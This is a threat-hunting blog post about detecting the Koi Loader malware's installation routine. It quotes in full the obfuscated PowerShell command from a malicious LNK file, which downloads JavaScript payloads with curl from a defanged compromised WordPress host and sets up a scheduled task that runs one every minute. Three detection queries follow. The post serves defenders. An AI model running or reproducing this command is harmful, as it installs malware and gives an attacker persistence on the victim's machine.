175. Hunting Koi Loader Installation Routine
Hello everyone!
Malware installation routines are noisy. Most of the time. What does it mean? We can transform this noise into detection and hunting ideas!
Let's look at Koi Loader. It's commonly delivered with help of malicious LNK-files, like this one. So, it executes the following command:
powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\' + ('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; & ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; mv e8p1xhlnt1xd wg3c86ft8.js; . ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q7hl1gh07lmh4rm /tn wg3c86ft8;
As you can see, here we can see lots of detection and hunting opportunities! Let's start from abusing PowerShell to create a scheduled task:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("create" AND "minute")
Next thing, abusing curl.exe to download a malicious file from a compromised WordPress website:
event_type: "processcreatewin"
AND
proc_file_name: "curl.exe"
AND
cmdline: "wp-content"
Finally, let's hunt for suspicious JS files executed from %ProgramData% subfolders:
event_type: "processcreatewin"
AND
proc_file_name: "wscript.exe"
AND
cmdline: ("programdata" AND *js")
See you tomorrow!
Comments
Post a Comment